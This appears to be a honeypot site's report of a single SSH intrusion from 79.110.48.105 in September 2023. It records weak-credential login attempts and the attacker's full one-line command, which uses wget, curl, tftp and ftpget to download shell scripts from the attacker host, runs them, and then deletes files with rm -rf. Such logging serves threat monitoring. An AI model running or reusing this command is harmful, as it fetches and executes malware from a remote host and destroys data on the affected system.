Report of Attack 79.110.48.105 (105.48.110.79.in-addr.arpa) ssh observation

Header

Time	2023/09/10, 22:34:21 (GMT)
Transaction ID	FFEAC7IDKNAD7GNO
Service	ssh
Location	NL (Netherlands)
Attacker	79.110.48.105
Classification	Web script execution
Harm Potential	High

Description

Script execution method downloaded from the www (web)

Content

79.110.48.105 client username 'DUP usuario' and password 'usuario' entered
79.110.48.105 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.110.48.105/ohshit.sh; curl -O http://79.110.48.105/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 79.110.48.105 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 79.110.48.105; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 79.110.48.105 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Observation

Header

Time

2023/09/10, 22:34:21 (GMT)

Transaction ID

FFEAC7IDKNAD7GNO

Service

ssh

Location

NL (Netherlands)

Attacker

79.110.48.105

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content